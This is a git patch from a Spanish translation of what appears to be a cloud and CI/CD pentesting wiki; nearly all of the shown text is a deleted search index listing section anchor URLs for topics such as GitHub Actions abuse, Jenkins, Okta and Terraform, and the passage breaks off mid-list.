From 1164484bf32d77b6e27be8e422e9b826099138c7 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 21 Apr 2025 21:02:21 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation --- searchindex.json | 1 - src/images/venacus-logo.png | Bin 0 -> 9217 bytes .../az-authorization-privesc.md | 60 ++++++++---------- theme/ht_searcher.js | 57 ++++++++++++++--- 4 files changed, 72 insertions(+), 46 deletions(-) delete mode 100644 searchindex.json create mode 100644 src/images/venacus-logo.png diff --git a/searchindex.json b/searchindex.json deleted file mode 100644 index 54b9d1ebf..000000000 --- a/searchindex.json +++ /dev/null @@ -1 +0,0 @@ -{"doc_urls":["index.html#hacktricks-cloud","index.html#ejecutar-hacktricks-cloud-localmente","index.html#metodología-de-pentesting-cicd","index.html#metodología-de-pentesting-en-la-nube","index.html#licencia-y-descargo-de-responsabilidad","index.html#estadísticas-de-github","pentesting-ci-cd/pentesting-ci-cd-methodology.html#metodología-de-pentesting-cicd","pentesting-ci-cd/pentesting-ci-cd-methodology.html#vcs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#pipelines-cicd","pentesting-ci-cd/pentesting-ci-cd-methodology.html#metodología-de-pentesting-vcs","pentesting-ci-cd/pentesting-ci-cd-methodology.html#metodología-de-pentesting-de-pipelines","pentesting-ci-cd/pentesting-ci-cd-methodology.html#ppe---ejecución-de-pipeline-envenenado","pentesting-ci-cd/pentesting-ci-cd-methodology.html#beneficios-de-la-explotación","pentesting-ci-cd/pentesting-ci-cd-methodology.html#más-información-relevante","pentesting-ci-cd/pentesting-ci-cd-methodology.html#herramientas-y-benchmark-cis","pentesting-ci-cd/pentesting-ci-cd-methodology.html#top-10-riesgos-de-seguridad-cicd","pentesting-ci-cd/pentesting-ci-cd-methodology.html#laboratorios","pentesting-ci-cd/pentesting-ci-cd-methodology.html#herramientas-automáticas","pentesting-ci-cd/pentesting-ci-cd-methodology.html#referencias","pentesting-ci-cd/github-security/index.html#seguridad-de-github","pentesting-ci-cd/github-security/index.html#qué-es-github","pentesting-ci-cd/github-security/index.html#información-básica","pentesting-ci-cd/github-security/index.html#reconocimiento-externo","pentesting-ci-cd/github-security/index.html#github-dorks","pentesting-ci-cd/github-security/index.html#filtraciones-de-github","pentesting-ci-cd/github-security/index.html#forks-externos","pentesting-ci-cd/github-security/index.html#filtraciones-de-github-en-forks-eliminadosinternos","pentesting-ci-cd/github-security/index.html#fortalecimiento-de-la-organización","pentesting-ci-cd/github-security/index.html#privilegios-de-miembros","pentesting-ci-cd/github-security/index.html#configuración-de-acciones","pentesting-ci-cd/github-security/index.html#integraciones","pentesting-ci-cd/github-security/index.html#reconocimiento-y-ataques-abusando-de-credenciales","pentesting-ci-cd/github-security/index.html#con-credenciales-de-usuario","pentesting-ci-cd/github-security/index.html#con-clave-ssh-de-usuario","pentesting-ci-cd/github-security/index.html#con-token-de-usuario","pentesting-ci-cd/github-security/index.html#con-aplicación-oauth","pentesting-ci-cd/github-security/index.html#con-aplicación-de-github","pentesting-ci-cd/github-security/index.html#compromiso-y-abuso-de-github-action","pentesting-ci-cd/github-security/index.html#bypass-de-protección-de-ramas","pentesting-ci-cd/github-security/index.html#eludir-protecciones-de-entornos","pentesting-ci-cd/github-security/index.html#persistencia","pentesting-ci-cd/github-security/index.html#commits-de-impostor---puerta-trasera-a-través-de-commits-de-repositorio","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusando-de-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#información-básica","pentesting-ci-cd/github-security/abusing-github-actions/index.html#resumen-de-impactos","pentesting-ci-cd/github-security/abusing-github-actions/index.html#github_token","pentesting-ci-cd/github-security/abusing-github-actions/index.html#ejecución-permitida","pentesting-ci-cd/github-security/abusing-github-actions/index.html#ejecución-desde-la-creación-de-un-repositorio","pentesting-ci-cd/github-security/abusing-github-actions/index.html#ejecución-desde-una-nueva-rama","pentesting-ci-cd/github-security/abusing-github-actions/index.html#ejecución-forked","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pull_request_target","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_run","pentesting-ci-cd/github-security/abusing-github-actions/index.html#workflow_call","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusando-de-la-ejecución-bifurcada","pentesting-ci-cd/github-security/abusing-github-actions/index.html#ejecución-de-checkout-no-confiable","pentesting-ci-cd/github-security/abusing-github-actions/index.html#inyecciones-de-script-en-contexto","pentesting-ci-cd/github-security/abusing-github-actions/index.html#inyección-de-script-github_env","pentesting-ci-cd/github-security/abusing-github-actions/index.html#acciones-de-github-de-terceros-vulnerables","pentesting-ci-cd/github-security/abusing-github-actions/index.html#otro-acceso-externo","pentesting-ci-cd/github-security/abusing-github-actions/index.html#secuestro-de-repositorio-de-namespace-eliminado","pentesting-ci-cd/github-security/abusing-github-actions/index.html#pivotar-repositorio","pentesting-ci-cd/github-security/abusing-github-actions/index.html#envenenamiento-de-caché","pentesting-ci-cd/github-security/abusing-github-actions/index.html#envenenamiento-de-artefactos","pentesting-ci-cd/github-security/abusing-github-actions/index.html#post-explotación-desde-una-acción","pentesting-ci-cd/github-security/abusing-github-actions/index.html#accediendo-a-aws-y-gcp-a-través-de-oidc","pentesting-ci-cd/github-security/abusing-github-actions/index.html#accediendo-a-secretos","pentesting-ci-cd/github-security/abusing-github-actions/index.html#abusando-de-los-runners-autoalojados","pentesting-ci-cd/github-security/abusing-github-actions/index.html#registro-de-imágenes-docker-de-github","pentesting-ci-cd/github-security/abusing-github-actions/index.html#información-sensible-en-los-registros-de-github-actions","pentesting-ci-cd/github-security/abusing-github-actions/index.html#cubriendo-tus-huellas","pentesting-ci-cd/github-security/abusing-github-actions/index.html#herramientas","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.html#gh-actions---poisoning-de-artefactos","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.html#gh-actions---envenenamiento-de-caché","pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.html#gh-actions---inyecciones-de-script-en-el-contexto","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#datos-eliminados-accesibles-en-github","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accediendo-a-datos-de-forks-eliminados","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accediendo-a-datos-de-repositorios-eliminados","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accediendo-a-datos-de-repositorios-privados","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#cómo-descubrir-commits-de-forks-eliminadosocultos","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#accediendo-directamente-al-commit","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#fuerza-bruta-de-valores-sha-1-cortos","pentesting-ci-cd/github-security/accessible-deleted-data-in-github.html#referencias","pentesting-ci-cd/github-security/basic-github-information.html#información-básica-de-github","pentesting-ci-cd/github-security/basic-github-information.html#estructura-básica","pentesting-ci-cd/github-security/basic-github-information.html#privilegios","pentesting-ci-cd/github-security/basic-github-information.html#roles-de-empresa","pentesting-ci-cd/github-security/basic-github-information.html#roles-de-organización","pentesting-ci-cd/github-security/basic-github-information.html#privilegios-de-los-miembros","pentesting-ci-cd/github-security/basic-github-information.html#roles-de-repositorio","pentesting-ci-cd/github-security/basic-github-information.html#equipos","pentesting-ci-cd/github-security/basic-github-information.html#usuarios","pentesting-ci-cd/github-security/basic-github-information.html#autenticación-de-github","pentesting-ci-cd/github-security/basic-github-information.html#acceso-web","pentesting-ci-cd/github-security/basic-github-information.html#claves-ssh","pentesting-ci-cd/github-security/basic-github-information.html#tokens-de-acceso-personal","pentesting-ci-cd/github-security/basic-github-information.html#aplicaciones-oauth","pentesting-ci-cd/github-security/basic-github-information.html#aplicaciones-de-github","pentesting-ci-cd/github-security/basic-github-information.html#github-actions","pentesting-ci-cd/github-security/basic-github-information.html#acciones-de-git","pentesting-ci-cd/github-security/basic-github-information.html#configuración","pentesting-ci-cd/github-security/basic-github-information.html#secretos-de-git","pentesting-ci-cd/github-security/basic-github-information.html#entornos-de-git","pentesting-ci-cd/github-security/basic-github-information.html#git-action-runner","pentesting-ci-cd/github-security/basic-github-information.html#compromiso-de-git-action","pentesting-ci-cd/github-security/basic-github-information.html#protecciones-de-ramas","pentesting-ci-cd/github-security/basic-github-information.html#referencias","pentesting-ci-cd/gitea-security/index.html#seguridad-de-gitea","pentesting-ci-cd/gitea-security/index.html#qué-es-gitea","pentesting-ci-cd/gitea-security/index.html#información-básica","pentesting-ci-cd/gitea-security/index.html#laboratorio","pentesting-ci-cd/gitea-security/index.html#enumeración-no-autenticada","pentesting-ci-cd/gitea-security/index.html#explotación-interna","pentesting-ci-cd/gitea-security/index.html#con-credenciales-de-usuariocookie-web","pentesting-ci-cd/gitea-security/index.html#con-clave-ssh-de-usuario","pentesting-ci-cd/gitea-security/index.html#con-token-de-usuario","pentesting-ci-cd/gitea-security/index.html#con-aplicación-oauth","pentesting-ci-cd/gitea-security/index.html#bypass-de-protección-de-ramas","pentesting-ci-cd/gitea-security/index.html#enumerar-webhooks","pentesting-ci-cd/gitea-security/index.html#post-explotación","pentesting-ci-cd/gitea-security/index.html#dentro-del-servidor","pentesting-ci-cd/gitea-security/basic-gitea-information.html#información-básica-de-gitea","pentesting-ci-cd/gitea-security/basic-gitea-information.html#estructura-básica","pentesting-ci-cd/gitea-security/basic-gitea-information.html#permisos","pentesting-ci-cd/gitea-security/basic-gitea-information.html#organizaciones","pentesting-ci-cd/gitea-security/basic-gitea-information.html#equipos-y-usuarios","pentesting-ci-cd/gitea-security/basic-gitea-information.html#autenticación-de-gitea","pentesting-ci-cd/gitea-security/basic-gitea-information.html#acceso-web","pentesting-ci-cd/gitea-security/basic-gitea-information.html#claves-ssh","pentesting-ci-cd/gitea-security/basic-gitea-information.html#tokens-de-acceso-personal","pentesting-ci-cd/gitea-security/basic-gitea-information.html#aplicaciones-oauth","pentesting-ci-cd/gitea-security/basic-gitea-information.html#claves-de-despliegue","pentesting-ci-cd/gitea-security/basic-gitea-information.html#protecciones-de-ramas","pentesting-ci-cd/concourse-security/index.html#seguridad-de-concourse","pentesting-ci-cd/concourse-security/index.html#información-básica","pentesting-ci-cd/concourse-security/index.html#arquitectura-de-concourse","pentesting-ci-cd/concourse-security/index.html#laboratorio-de-concourse","pentesting-ci-cd/concourse-security/index.html#enumerar-y-atacar-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#arquitectura-de-concourse","pentesting-ci-cd/concourse-security/concourse-architecture.html#arquitectura-de-concourse-1","pentesting-ci-cd/concourse-security/concourse-architecture.html#arquitectura","pentesting-ci-cd/concourse-security/concourse-architecture.html#referencias","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#creación-del-laboratorio-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#entorno-de-pruebas","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#ejecutando-concourse","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#crear-pipeline","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#steps","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#ejemplo-de-pipeline-simple","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#script-de-bash-con-tubería-de-salidaentrada","pentesting-ci-cd/concourse-security/concourse-lab-creation.html#disparadores","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeración-y-ataques","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#concourse-enumeración-y-ataques-1","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#roles-de-usuario-y-permisos","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#vars-y-administrador-de-credenciales","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#enumeración-de-concourse","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#ataques-de-concourse","pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.html#referencias","pentesting-ci-cd/circleci-security.html#seguridad-de-circleci","pentesting-ci-cd/circleci-security.html#información-básica","pentesting-ci-cd/circleci-security.html#permisos","pentesting-ci-cd/circleci-security.html#variables-de-entorno-y-secretos","pentesting-ci-cd/circleci-security.html#ataques","pentesting-ci-cd/travisci-security/index.html#travisci-seguridad","pentesting-ci-cd/travisci-security/index.html#qué-es-travisci","pentesting-ci-cd/travisci-security/index.html#ataques","pentesting-ci-cd/travisci-security/index.html#disparadores","pentesting-ci-cd/travisci-security/index.html#pr-de-terceros","pentesting-ci-cd/travisci-security/index.html#volcado-de-secretos","pentesting-ci-cd/travisci-security/index.html#todo","pentesting-ci-cd/travisci-security/index.html#travisci-enterprise","pentesting-ci-cd/travisci-security/index.html#referencias","pentesting-ci-cd/travisci-security/basic-travisci-information.html#información-básica-de-travisci","pentesting-ci-cd/travisci-security/basic-travisci-information.html#acceso","pentesting-ci-cd/travisci-security/basic-travisci-information.html#secretos-encriptados","pentesting-ci-cd/travisci-security/basic-travisci-information.html#variables-de-entorno","pentesting-ci-cd/travisci-security/basic-travisci-information.html#secretos-encriptados-personalizados","pentesting-ci-cd/travisci-security/basic-travisci-information.html#archivos-encriptados-personalizados","pentesting-ci-cd/travisci-security/basic-travisci-information.html#travisci-enterprise","pentesting-ci-cd/jenkins-security/index.html#seguridad-de-jenkins","pentesting-ci-cd/jenkins-security/index.html#información-básica","pentesting-ci-cd/jenkins-security/index.html#enumeración-no-autenticada","pentesting-ci-cd/jenkins-security/index.html#vulnerabilidades-conocidas","pentesting-ci-cd/jenkins-security/index.html#inicio-de-sesión","pentesting-ci-cd/jenkins-security/index.html#registro","pentesting-ci-cd/jenkins-security/index.html#inicio-de-sesión-sso","pentesting-ci-cd/jenkins-security/index.html#fuerza-bruta","pentesting-ci-cd/jenkins-security/index.html#password-spraying","pentesting-ci-cd/jenkins-security/index.html#bypass-de-ip-whitelisting","pentesting-ci-cd/jenkins-security/index.html#abusos-internos-de-jenkins","pentesting-ci-cd/jenkins-security/index.html#listando-usuarios","pentesting-ci-cd/jenkins-security/index.html#extracción-de-builds-para-encontrar-secretos-en-texto-claro","pentesting-ci-cd/jenkins-security/index.html#robando-credenciales-ssh","pentesting-ci-cd/jenkins-security/index.html#rce-en-jenkins","pentesting-ci-cd/jenkins-security/index.html#rce-creandomodificando-un-proyecto","pentesting-ci-cd/jenkins-security/index.html#rce-ejecutar-script-groovy","pentesting-ci-cd/jenkins-security/index.html#rce-creandomodificando-pipeline","pentesting-ci-cd/jenkins-security/index.html#explotación-de-pipeline","pentesting-ci-cd/jenkins-security/index.html#construir-pipelines","pentesting-ci-cd/jenkins-security/index.html#rce-de-pipeline","pentesting-ci-cd/jenkins-security/index.html#comprobando-variables-de-entorno","pentesting-ci-cd/jenkins-security/index.html#extracción-de-secretos","pentesting-ci-cd/jenkins-security/index.html#disparadores","pentesting-ci-cd/jenkins-security/index.html#nodos-y-agentes","pentesting-ci-cd/jenkins-security/index.html#ejemplo-completo","pentesting-ci-cd/jenkins-security/index.html#lectura-arbitraria-de-archivos-a-rce","pentesting-ci-cd/jenkins-security/index.html#rce","pentesting-ci-cd/jenkins-security/index.html#post-explotación","pentesting-ci-cd/jenkins-security/index.html#metasploit","pentesting-ci-cd/jenkins-security/index.html#jenkins-secrets","pentesting-ci-cd/jenkins-security/index.html#crear-un-nuevo-usuario-administrador","pentesting-ci-cd/jenkins-security/index.html#referencias","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#información-básica-de-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#acceso","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#nombre-de-usuario--contraseña","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#cookie","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#ssoplugins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#tokens","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#claves-ssh","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#autorización","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#reino-de-seguridad","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#nodos-agentes-y-ejecutores-de-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#secretos-de-jenkins","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#cifrado-de-secretos-y-credenciales","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#acceso-a-credenciales","pentesting-ci-cd/jenkins-security/basic-jenkins-information.html#referencias","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-con-script-groovy","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#jenkins-rce-con-script-groovy-1","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#shell-inversa-en-linux","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#reverse-shell-en-windows","pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.html#script","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#jenkins-rce-creandomodificando-proyecto","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#creando-un-proyecto","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#modificando-un-proyecto","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.html#ejecución","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#jenkins-rce-creandomodificando-pipeline","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#creando-un-nuevo-pipeline","pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.html#modificando-un-pipeline","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#jenkins-lectura-arbitraria-de-archivos-a-rce-a-través-de-recordarme","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#prerrequisitos-del-ataque","pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.html#proceso-de-explotación-detallado","pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.html#jenkins-dumping-secrets-from-groovy","pentesting-ci-cd/apache-airflow-security/index.html#seguridad-de-apache-airflow","pentesting-ci-cd/apache-airflow-security/index.html#información-básica","pentesting-ci-cd/apache-airflow-security/index.html#laboratorio-local","pentesting-ci-cd/apache-airflow-security/index.html#configuración-de-airflow","pentesting-ci-cd/apache-airflow-security/index.html#rbac-de-airflow","pentesting-ci-cd/apache-airflow-security/index.html#ataques","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#configuración-de-airflow","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#archivo-de-configuración","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#api","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#atlas","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#celery","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#core","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#dask","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#kerberos","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#logging","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#secrets","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#smtp","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#webserver","pentesting-ci-cd/apache-airflow-security/airflow-configuration.html#autenticación-web","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#airflow-rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#rbac","pentesting-ci-cd/apache-airflow-security/airflow-rbac.html#permisos-predeterminados","pentesting-ci-cd/terraform-security.html#seguridad-de-terraform","pentesting-ci-cd/terraform-security.html#información-básica","pentesting-ci-cd/terraform-security.html#laboratorio-de-terraform","pentesting-ci-cd/terraform-security.html#rce-en-terraform-envenenamiento-de-archivos-de-configuración","pentesting-ci-cd/terraform-security.html#terraform-plan","pentesting-ci-cd/terraform-security.html#terraform-apply","pentesting-ci-cd/terraform-security.html#extracción-de-secretos","pentesting-ci-cd/terraform-security.html#abusando-de-los-archivos-de-estado-de-terraform","pentesting-ci-cd/terraform-security.html#rce-en-terraform-envenenamiento-de-archivos-de-configuración-1","pentesting-ci-cd/terraform-security.html#eliminando-recursos","pentesting-ci-cd/terraform-security.html#reemplazar-proveedor-en-la-lista-negra","pentesting-ci-cd/terraform-security.html#herramientas-de-auditoría-automáticas","pentesting-ci-cd/terraform-security.html#snyk-infrastructure-as-code-iac","pentesting-ci-cd/terraform-security.html#checkov","pentesting-ci-cd/terraform-security.html#terraform-compliance","pentesting-ci-cd/terraform-security.html#tfsec","pentesting-ci-cd/terraform-security.html#kicks","pentesting-ci-cd/terraform-security.html#terrascan","pentesting-ci-cd/terraform-security.html#referencias","pentesting-ci-cd/atlantis-security.html#atlantis-security","pentesting-ci-cd/atlantis-security.html#información-básica","pentesting-ci-cd/atlantis-security.html#laboratorio-local","pentesting-ci-cd/atlantis-security.html#acceso-a-atlantis","pentesting-ci-cd/atlantis-security.html#configuración-del-servidor","pentesting-ci-cd/atlantis-security.html#comandos-de-atlantis","pentesting-ci-cd/atlantis-security.html#ataques","pentesting-ci-cd/atlantis-security.html#post-explotación","pentesting-ci-cd/atlantis-security.html#mitigaciones","pentesting-ci-cd/atlantis-security.html#referencias","pentesting-ci-cd/cloudflare-security/index.html#seguridad-de-cloudflare","pentesting-ci-cd/cloudflare-security/index.html#sitios-web","pentesting-ci-cd/cloudflare-security/index.html#registro-de-dominio","pentesting-ci-cd/cloudflare-security/index.html#análisis","pentesting-ci-cd/cloudflare-security/index.html#páginas","pentesting-ci-cd/cloudflare-security/index.html#workers","pentesting-ci-cd/cloudflare-security/index.html#r2","pentesting-ci-cd/cloudflare-security/index.html#stream","pentesting-ci-cd/cloudflare-security/index.html#imágenes","pentesting-ci-cd/cloudflare-security/index.html#centro-de-seguridad","pentesting-ci-cd/cloudflare-security/index.html#turnstile","pentesting-ci-cd/cloudflare-security/index.html#zero-trust","pentesting-ci-cd/cloudflare-security/index.html#redireccionamientos-masivos","pentesting-ci-cd/cloudflare-security/index.html#notificaciones","pentesting-ci-cd/cloudflare-security/index.html#gestionar-cuenta","pentesting-ci-cd/cloudflare-security/index.html#investigación-de-ddos","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#dominios-de-cloudflare","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#resumen","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#analítica","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#dns","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#correo-electrónico","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#espectro","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#ssltls","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#seguridad","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#acceso","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#velocidad","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#caché","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#rutas-de-workers","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#reglas","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#red","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#tráfico","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#páginas-personalizadas","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#aplicaciones","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#scrape-shield","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#zaraz","pentesting-ci-cd/cloudflare-security/cloudflare-domains.html#web3","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#cloudflare-zero-trust-network","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#analytics","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#gateway","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#access","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#my-team","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#logs","pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.html#settings","pentesting-ci-cd/okta-security/index.html#seguridad-de-okta","pentesting-ci-cd/okta-security/index.html#información-básica","pentesting-ci-cd/okta-security/index.html#resumen","pentesting-ci-cd/okta-security/index.html#ataques","pentesting-ci-cd/okta-security/index.html#localizando-el-portal-de-okta","pentesting-ci-cd/okta-security/index.html#inicio-de-sesión-en-okta-a-través-de-kerberos","pentesting-ci-cd/okta-security/index.html#secuestro-del-agente-ad-de-okta","pentesting-ci-cd/okta-security/index.html#secuestro-de-ad-como-administrador","pentesting-ci-cd/okta-security/index.html#proveedor-saml-falso-de-okta","pentesting-ci-cd/okta-security/index.html#ataque-de-suplantación-de-colega","pentesting-ci-cd/okta-security/index.html#evadiendo-políticas-de-detección-de-comportamiento","pentesting-ci-cd/okta-security/index.html#fortalecimiento-de-okta","pentesting-ci-cd/okta-security/index.html#referencias","pentesting-ci-cd/okta-security/okta-hardening.html#okta-hardening","pentesting-ci-cd/okta-security/okta-hardening.html#directorio","pentesting-ci-cd/okta-security/okta-hardening.html#personas","pentesting-ci-cd/okta-security/okta-hardening.html#grupos","pentesting-ci-cd/okta-security/okta-hardening.html#dispositivos","pentesting-ci-cd/okta-security/okta-hardening.html#editor-de-perfil","pentesting-ci-cd/okta-security/okta-hardening.html#integraciones-de-directorio","pentesting-ci-cd/okta-security/okta-hardening.html#fuentes-de-perfil","pentesting-ci-cd/okta-security/okta-hardening.html#personalizaciones","pentesting-ci-cd/okta-security/okta-hardening.html#marcas","pentesting-ci-cd/okta-security/okta-hardening.html#sms","pentesting-ci-cd/okta-security/okta-hardening.html#panel-de-control-del-usuario-final","pentesting-ci-cd/okta-security/okta-hardening.html#otro","pentesting-ci-cd/okta-security/okta-hardening.html#aplicaciones","pentesting-ci-cd/okta-security/okta-hardening.html#aplicaciones-1","pentesting-ci-cd/okta-security/okta-hardening.html#gobernanza-de-identidad","pentesting-ci-cd/okta-security/okta-hardening.html#certificaciones-de-acceso","pentesting-ci-cd/okta-security/okta-hardening.html#seguridad","pentesting-ci-cd/okta-security/okta-hardening.html#general","pentesting-ci-cd/okta-security/okta-hardening.html#healthinsight","pentesting-ci-cd/okta-security/okta-hardening.html#autenticadores","pentesting-ci-cd/okta-security/okta-hardening.html#políticas-de-autenticación","pentesting-ci-cd/okta-security/okta-hardening.html#política-de-sesión-global","pentesting-ci-cd/okta-security/okta-hardening.html#proveedores-de-identidad","pentesting-ci-cd/okta-security/okta-hardening.html#autenticación-delegada","pentesting-ci-cd/okta-security/okta-hardening.html#red","pentesting-ci-cd/okta-security/okta-hardening.html#integraciones-de-dispositivos","pentesting-ci-cd/okta-security/okta-hardening.html#api","pentesting-ci-cd/okta-security/okta-hardening.html#flujo-de-trabajo","pentesting-ci-cd/okta-security/okta-hardening.html#automatizaciones","pentesting-ci-cd/okta-security/okta-hardening.html#informes","pentesting-ci-cd/okta-security/okta-hardening.html#informes-1","pentesting-ci-cd/okta-security/okta-hardening.html#registro-del-sistema","pentesting-ci-cd/okta-security/okta-hardening.html#monitoreo-de-importación","pentesting-ci-cd/okta-security/okta-hardening.html#límites-de-tasa","pentesting-ci-cd/okta-security/okta-hardening.html#configuraciones","pentesting-ci-cd/okta-security/okta-hardening.html#cuenta","pentesting-ci-cd/okta-security/okta-hardening.html#descargas","pentesting-ci-cd/serverless.com-security.html#seguridad-de-serverlesscom","pentesting-ci-cd/serverless.com-security.html#información-básica","pentesting-ci-cd/serverless.com-security.html#organización","pentesting-ci-cd/serverless.com-security.html#equipo","pentesting-ci-cd/serverless.com-security.html#aplicación","pentesting-ci-cd/serverless.com-security.html#servicios","pentesting-ci-cd/serverless.com-security.html#tutorial","pentesting-ci-cd/serverless.com-security.html#revisión-de-seguridad-de-serverlesscom","pentesting-ci-cd/serverless.com-security.html#roles-y-permisos-iam-mal-configurados","pentesting-ci-cd/serverless.com-security.html#secretos-inseguros-y-gestión-de-configuración","pentesting-ci-cd/serverless.com-security.html#código-y-dependencias-vulnerables","pentesting-ci-cd/serverless.com-security.html#registro-y-monitoreo-inadecuados","pentesting-ci-cd/serverless.com-security.html#configuraciones-inseguras-de-api-gateway","pentesting-ci-cd/serverless.com-security.html#aislamiento-insuficiente-de-funciones","pentesting-ci-cd/serverless.com-security.html#protección-de-datos-inadecuada","pentesting-ci-cd/serverless.com-security.html#falta-de-manejo-adecuado-de-errores","pentesting-ci-cd/serverless.com-security.html#prácticas-de-despliegue-inseguras","pentesting-ci-cd/serverless.com-security.html#vulnerabilidades-en-plugins-y-extensiones","pentesting-ci-cd/serverless.com-security.html#exposición-de-puntos-finales-sensibles","pentesting-ci-cd/serverless.com-security.html#permisos-excesivos-para-miembros-del-equipo-y-colaboradores-externos","pentesting-ci-cd/serverless.com-security.html#seguridad-de-claves-de-acceso-y-claves-de-licencia","pentesting-ci-cd/supabase-security.html#seguridad-de-supabase","pentesting-ci-cd/supabase-security.html#información-básica","pentesting-ci-cd/supabase-security.html#subdominio","pentesting-ci-cd/supabase-security.html#configuración-de-la-base-de-datos","pentesting-ci-cd/supabase-security.html#configuración-de-la-api","pentesting-ci-cd/supabase-security.html#claves-de-api-anon","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#seguridad-de-ansible-tower--awx--controlador-de-automatización","p